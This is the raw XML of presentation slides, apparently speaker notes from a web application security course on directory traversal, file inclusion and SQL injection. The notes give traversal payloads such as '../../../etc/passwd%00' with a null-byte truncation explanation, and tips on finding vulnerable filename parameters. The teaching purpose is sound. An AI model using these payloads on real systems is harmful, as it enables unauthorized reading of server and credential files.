            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Not all directory traversal vulnerabilities are immediately identifiable.  Sometimes a hidden field in a web form will simply include text, such as "message-stuff".  However, this may well  be a filename.  Try changing it to "../message-stuff" and see how the page changes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Remember, we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'re talking about exploiting code written by developers who most frequently only think about how an application is supposed to work, and attempts to make it follow that mold.  If all goes well, the application mostly behaves as anticipated.  If we touch it, however, it cries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any code which may access files in the server filesystem may be vulnerable.  If we have any control, we have to check!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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81</a:t>
            </a:fld>
            <a:endParaRPr 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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To test for this flaw, simply look for parameters that appear to contain file names and change them to point outside the web root.  Also look for parameters that are the basis for a filename such as the example of templ=red above which the application expands to ../../template/red.php.</a:t>
            </a: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82</a:t>
            </a:fld>
            <a:endParaRPr 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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287747"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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In order to conduct directory traversal attacks, it is important to understand where the default locations for various files is located.  For example, Debian-based Linux systems with Apache often use /var/www/ as the webroot.  Users have their own webroots in /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>/public_html/.  The directory /usr/lib/cgi-bin is a common location for CGI scripts.  Other applications may have their own, well-known webroot and scripts directory.  The most important thing to understand is where the "current working directory" is when the script/application executes.  That is where to begin thinking when you type your first "../"</a:t>
            </a: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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228356" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4763" indent="-4763">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Once you have identified a potentially vulnerable parameter, try out different ways to force it to load what you want.  For example, if we take the example from a previous slide: ../../template/${tempvar}.php, we can do the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4763" indent="-4763">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="798513" indent="-174625">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>../index which may load the source code from the index file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="798513" indent="-174625">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> ../../../etc/passwd%00 which may load the /etc/passwd file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="623888" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The %00 is a null which many languages use to specify the end of a string.  In our example the results would be ../../template/../../../etc/passwd%00.php.  The OS would ignore the %00 and the rest of the string.</a:t>
            </a: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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289795" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File include flaws can retrieve files locally or remotely.  This is from the perspective of the application, so local files are ones that reside on the server the application is running on.  Remote files would be from a different server.  Keep in mind that egress filtering may block the application from loading files from external servers, but this would still allow for servers within the network to be accessed.</a:t>
            </a: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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290819" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL injection is a great vulnerability for an attacker.  It allows them to run practically any query they can imagine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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1842" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3170238" cy="479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5139" tIns="49472" rIns="95139" bIns="49472"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D0D68C"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1300">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291843" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4144963" y="0"/>
            <a:ext cx="3170237" cy="479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5139" tIns="49472" rIns="95139" bIns="49472"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="482600">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
                <a:tab pos="9666288" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="482600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482600" algn="l"/>
                <a:tab pos="966788" algn="l"/>
                <a:tab pos="1449388" algn="l"/>
                <a:tab pos="1933575" algn="l"/>
                <a:tab pos="2416175" algn="l"/>
                <a:tab pos="2900363" algn="l"/>
                <a:tab pos="3382963" algn="l"/>
                <a:tab pos="3867150" algn="l"/>
                <a:tab pos="4349750" algn="l"/>
                <a:tab pos="4832350" algn="l"/>
                <a:tab pos="5316538" algn="l"/>
                <a:tab pos="5799138" algn="l"/>
                <a:tab pos="6283325" algn="l"/>
                <a:tab pos="6765925" algn="l"/>
                <a:tab pos="7250113" algn="l"/>
                <a:tab pos="7732713" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8699500" algn="l"/>
                <a:tab pos="9182100" algn="l"/>
